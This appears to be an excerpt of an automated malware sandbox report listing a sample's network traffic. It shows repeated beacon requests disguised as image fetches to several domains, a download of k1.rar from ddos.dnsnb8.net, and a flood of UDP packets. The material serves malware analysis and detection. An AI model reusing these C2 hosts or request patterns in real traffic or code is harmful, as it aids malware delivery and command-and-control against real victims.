        Source: global trafficHTTP traffic detected: GET /xs.jpg?9a7e303d=-814051145 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?325396b5=-1835223640 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?17f3b14d=-1883887666 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159489|1720159259|4|56|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?912c2e80=445489792 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159490|1720159259|4|56|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1ad41f3e=450109246 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159490|1720159260|4|56|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?d1cd8e49=1614413969 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?45eba6e7=794638136 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8021ab3c=-2145277124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159493|1720159259|4|57|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a8434aa9=-1471984983 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159494|1720159259|4|57|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?b7b2891=1733586201 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159494|1720159260|4|57|0; snkz=8.46.123.33
        Source: unknownUDP traffic detected without corresponding DNS query: 85.17.167.196
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exeCode function: 6_2_0043E810 ioctlsocket,recvfrom,6_2_0043E810
        Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?5e49a2=6179234 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /xs.jpg?60b080=25346560 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?63977b=19580529 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /xs.jpg?71a0be=14893436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?84b38e=43483590 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e6979d=105784651 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159259|1720159259|0|1|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?10010fa=33563124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159259|1720159259|0|1|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?10da53c=53014452 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159260|1720159260|0|1|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1209c47=37828750 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?13a89f9=164909000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?17b6de9=198930248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159264|1720159259|2|2|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1952911=185868151 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159265|1720159259|3|2|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?1a33e4b=109902124 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159265|1720159260|2|2|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?1b6026e=172232340 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1c98993=269866539 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?20ae1e9=239873375 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159268|1720159259|3|3|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?224a908=215742000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159269|1720159259|3|3|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?256dbec=353221452 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159269|1720159260|3|3|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?263e0bf=360900279 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?27da790=167157312 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?2dce9fa=384258000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159272|1720159259|3|4|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?2f6b0f9=149164779 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159272|1720159259|3|4|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?341e887=546510150 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159273|1720159260|3|4|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?34f3b0d=388668763 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?362c1e4=113607624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3c84448=190368984 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159276|1720159259|3|5|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?3dc8d75=518286248 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159276|1720159259|3|5|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?3e9e01a=262635624 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159277|1720159260|3|5|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?42142ff=692887030 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?434c9e5=282273684 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?475ad88=299284000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159280|1720159259|3|6|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?4ae2102=706685202 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159280|1720159259|3|6|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?4c9a32f=401616875 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159281|1720159260|3|6|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?513542c=255458436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?59e2a88=565509936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?676dbbc=108452796 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?6dcc621=690791622 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?7591ee5=1109530125 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?7ab8dec=1286835000 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?811c5c4=406147404 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?8f21b84=600337936 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?96faab4=1108191980 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?9b39c81=651063812 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?a2ff583=854576015 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?a95dff7=1598349231 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?bc3818e=986810310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?c29ba9f=612184029 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?c814e8b=1888207587 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?cd40c9d=1506564171 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?d5ebd9e=2018814606 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?e924854=-1850289336 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0
        Source: global trafficHTTP traffic detected: GET /xs.jpg?efa2e6a=-2033475142 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0
        Source: global trafficHTTP traffic detected: GET /images/xs.jpg?f75905a=1556177436 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; snkz=8.46.123.33
        Source: global trafficHTTP traffic detected: GET /xs.jpg?fbaba77=527791342 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
